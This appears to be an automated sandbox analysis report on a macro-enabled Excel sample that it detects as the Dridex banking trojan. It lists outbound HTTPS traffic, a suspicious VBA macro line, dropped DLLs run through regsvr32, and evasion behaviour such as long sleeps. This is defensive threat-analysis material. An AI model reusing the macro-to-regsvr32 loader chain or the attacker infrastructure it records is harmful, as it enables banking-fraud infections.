Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49313 version: TLS 1.2

E-Banking Fraud:

barindex
Detected Dridex e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CB5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004C5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function mi_1, API Run("listP_ab")
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: sample20210113-01.xlsmOLE, VBA macro line: Wscript.echo Run("" & oo2 & "ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function mi_1, String wscript: Wscript.echo Run("" & oo2 & "ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: sample20210113-01.xlsmInitial sample: CALL
Source: sample20210113-01.xlsmInitial sample: CALL
Source: sample20210113-01.xlsmInitial sample: CALL
Source: sample20210113-01.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ndrztpo.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\pgjasrqd.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDBE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004EBE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021BA14 NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CB5150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC88C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC8CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC98DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CBACD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCA0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCE0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDDCA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD50A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD4CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD5CB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD1020
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCD030
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCFDD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD89F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD71F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCD980
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDD180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCC590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CBF9A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC7564
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CB1570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD3EC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CB6AD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC96D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCF6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCB6F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC8EF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD62F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCAE80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC8AB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD1EB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD26B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD1240
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCA660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD7660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD2E60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CB9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CBCA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD0220
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDD620
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC67C8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC83C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC7FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD7FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCE3F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CCBF50
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC5B60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD3B00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD9B10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CD1730
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004C5150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E1020
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DD030
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D88C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D8CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D98DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004CACD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DA0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DE0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004EDCA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E50A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E4CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E5CB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D7564
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004C1570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DFDD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E89F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E71F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DD980
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004ED180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DC590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004CF9A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E1240
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DA660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E7660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E2E60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004C9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004CCA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004EFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E0220
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004ED620
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004EFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E3EC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004C6AD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D96D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DF6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DB6F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D8EF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E62F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DAE80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D8AB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E1EB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E26B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DBF50
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D5B60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E3B00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E9B10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E1730
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D67C8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D83C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D7FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004E7FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004DE3F0
Source: sample20210113-01.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: sample20210113-01.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal100.bank.expl.evad.winXLSM@11/18@3/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$sample20210113-01.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDC89.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: sample20210113-01.xlsmVirustotal: Detection: 25%
Source: sample20210113-01.xlsmReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll.
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: sample20210113-01.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: sample20210113-01.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: sample20210113-01.xlsmInitial sample: OLE indicators vbamacros = False
Source: lpxtpiw[1].zip.0.drStatic PE information: section name: .2
Source: lpxtpiw[1].zip.0.drStatic PE information: section name: .rdata2
Source: lpxtpiw[1].zip.0.drStatic PE information: section name: .text5
Source: lpxtpiw[1].zip.0.drStatic PE information: section name: .text4
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021BFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001E7172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_002062CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001FF6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001E899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001E89CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0020FB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001E1D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001E0E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ndrztpo.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\pgjasrqd.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001F88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key enumerated: More than 188 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2804Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -516000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -524000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -274000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -177000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -596000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -616000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -268000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -286000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -488000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -248000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -262000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -152000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -307000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -253000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -150000s >= -30000s
